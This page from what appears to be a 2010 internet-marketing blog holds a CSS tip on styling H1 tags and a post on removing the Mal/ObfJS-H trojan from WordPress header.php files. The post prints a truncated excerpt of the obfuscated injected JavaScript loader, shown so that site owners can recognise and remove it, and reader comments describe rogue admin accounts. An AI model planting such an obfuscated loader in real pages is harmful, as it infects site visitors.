Just Ask Matt - Answers

Changing the Font & Style of Your H1 Tags

QUESTION: (Rhonda) I am having problems changing the font size of my H1text. Is this very important? If so, how do I go about changing it?

Changing the text and/or style of an H1 tag is simple in CSS.  It does not affect anything other than how the visitor sees it though (i.e., if you use a large font, it means nothing more than a smaller font, in SEO terms or how Google sees it).

You can change the H1 tag locally or in the CSS definition file.

If you want to change all of the H1 tag settings in your entire website, you would do this in the CSS file:

h1 {
font-size: 24px;
}

You would use the h1 tag as you normally would:
<h1>This is my H1 tag</h1>

You can define a class in the CSS file which allows you to define your new style whenever you wish anywhere on the site:

.h1style {
font-size: 24px;
}

You would add this class to your h1 tag, when you wish it:

<h1 class=”h1style”>This is my H1 Tag</h1>

* Remember to add the “.” when defining it in the CSS to classify it as a class.

Finally, you can do it locally using a style attribute (without the CSS file):

<h1 style=”font-size:24px;”>This is my H1 Tag</h1>

All of the above do the exact same thing.  Their use is based on how often you use the style and how you want it defined (whether globally or locally).

Also, remember you can add other styles to the same definition (like color):

<h1 style=”font-size:24px; color:red;”>This is my H1 Tag that is Red and 24px high</h1>

I find that being able to change the styles of my text for header and other standard tags to be quite invaluable!  Knowing a little bit of CSS can go a long way.  Give this a try!

The easiest thing to try first is the local definition using the style attribute. If this is working for you, consider creating or editing your own CSS file!

Good luck!  cheers…matt


Read Full Post >>
More Questions & Answers...
GOT A QUESTION?

Who is Behind Marketing Mind?

Matthew Bredel begin_of_the_skype_highlighting     end_of_the_skype_highlightingMy name is Matthew Bredel and as of March, 2007, I am a full-time, work-at-home internet marketer. For close to 10 years, I worked for a defense company which was an OK job, but I was so uninspired in life and frankly, I needed some more money. That is when I first discovered internet marketing! Now I admit that I didn't start making thousands in my first couple of months (in fact, I lost my shirt!), but I finally saw the "internet light"...

Read More about Matthew Bredel
GURU STUFF END -->

Mal/ObfJS-H Wordpress Hacked

February 2nd, 2010 . by Matthew Bredel . Tweet This!
Share This Post...

Beware! Wordpress hackers are on the loose and it seems that you may be vulnerable. The Mal/ObfJS-H trojan is appearing on lots of Wordpress blogs and most people don’t know why or what to do. It’s not difficult to find or fix, as long as you know where to look…

wp4This is screwed up!

OK, so I got a call from my cousin this morning telling me that visitors to his blog were receiving a trojan warning about Mal/ObfJS-H.  Hmmm…that is totally weird.  So I did a little bit of searching and found this article (dated today, by the way) talking about the fact that this has been happening to other people, particularly those with Wordpress blogs.

So I did a little bit of digging in his Wordpress blog and sure enough, there it was!  A blatant hack into the header.php file of his Wordpress theme.

DAMN!  I haven’t seen a hack this open in a long time.  Now, I really don’t know much about it other than how to recognize it and how to removed it.

1) Mal/ObjJS-H Discovery

Assuming you have some kind of internet protection software, you should see a trojan error when you go to your blog.  That is pretty obvious (but again, not all of us have that type of protection.)

2) Finding the Mal/ObjJS-H Trojan Code

It appears that the hacker puts this code just below the closing head tag </head> in the header.php file of your template. It is a javascript encrypted routine that looks like a bunch of goobly-gook as follows:

<script language=javascript>document.write(unescape(’%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61773%63%72%69%70%74%22%3E%66%75%6E%63%74…%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%…264C%261B%268E%261B%264D0tdsjqu%264F1′)</script>

This is a bit condensed.  I didn’t really want to put the full code here.  But realize that this does not appear in the standard view source code (at least it didn’t when I originally checked).  I only discovered it when I looked at the header.php file in the Appearance Editor.

3) Finding and removing the hack

Within your Wordpress admin, choose “Editor” under the Appearance section on the left hand menu in Wordpress.

wp1

Then, in the right column, choose the header.php file…

wp2

Finally, in the main window, scroll down to the </head> tag and see if that ugly javascript routine exists.  If so DELETE IT!  You want to delete from the first <script> tag to the closing </script> tag (as kind of shown above).

wp3

That should do it!  You may need to clear the cache on your web browser to no longer see the Mal/ObfJS-M trojan error, but hopefully this solves your problem (it did for us).

4) Prevention!

Again, I am not exactly sure who or why this is being done (probably a tracking cookie or maybe a cookie stuff), but my best advice to you is to make sure that all of the write permissions to your theme files are closed to anyone but the owner.  (This is usually called a 755 permission).  Depending on your FTP product, cpanel, host management software, etc. this will be different, but it isn’t a bad thing to do right now.  Again, that my be the problem, but who knows.

For now, just keep an eye on things and lock this down if you can.  This is the second case I have heard of today.

Gosh, don’t you love internet hacking?  NOT!

cheers…matt

Don't Buy Another Money Making Product Until You Watch These FREE Videos!

First Name:
Email:

Posted in Feature, Geek Stuff, Ramble On, Website Design |
Tagged With:  

8 Responses to “Mal/ObfJS-H Wordpress Hacked”

  1. Hey Matt,

    If you still have the full text of the javascript you removed from the header, you can just copy it to a clean page, alter document.write to document.alert and open the page in a browser to find out what the obfuscated code actually says…

    If you do, I’d love to know.

    Thanks,

    Steve

    Posted by: Steve Gunn
    February 2nd, 2010 at 2:50 pm

  2. Hey Matt,

    Thanks for the heads up. I appreciate the easy to follow instructions!

    ~Maria

    Posted by: Maria
    February 3rd, 2010 at 4:41 pm

  3. Just helped a friend out with this same problem — a Dreamhost-ed Wordpress blog. I removed the malicious code but am eager to find out how to prevent its recurrence.

    Posted by: Rachel
    February 6th, 2010 at 7:06 pm

  4. Thanks Matt! I worked for a couple of days trying to find the hacked code, then found it immediately after reading your post.

    Posted by: Keith
    February 14th, 2010 at 12:45 pm

  5. The same thing happened to me but I would say the story is not over. I checked my database table and the hacker added an administrator account.

    I would check your users table and make sure that doesn’t exist. Also I would keep checking because if they had access as an admin they could have uploaded another script that would reopen their account if it was deleted.

    Posted by: Brian Lyssy
    February 15th, 2010 at 2:18 pm

  6. Hey Brian,

    OK, that sounds scary (and something I did not think about)! I will definitely go back and look at this. Thanks for the heads up!

    cheers…matt

    Posted by: Matthew Bredel
    February 15th, 2010 at 2:54 pm

  7. I’m getting a URL:mal error in my site - problem is I can’t access my editor - my dashboard is experiencing problems - any suggestions?

    Posted by: michelle
    May 12th, 2010 at 7:57 am

  8. Lo dice el que llegaba ridiculamente temprano al trabajo jejejeje…

    Posted by: Linguim
    January 4th, 2012 at 11:26 pm

Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>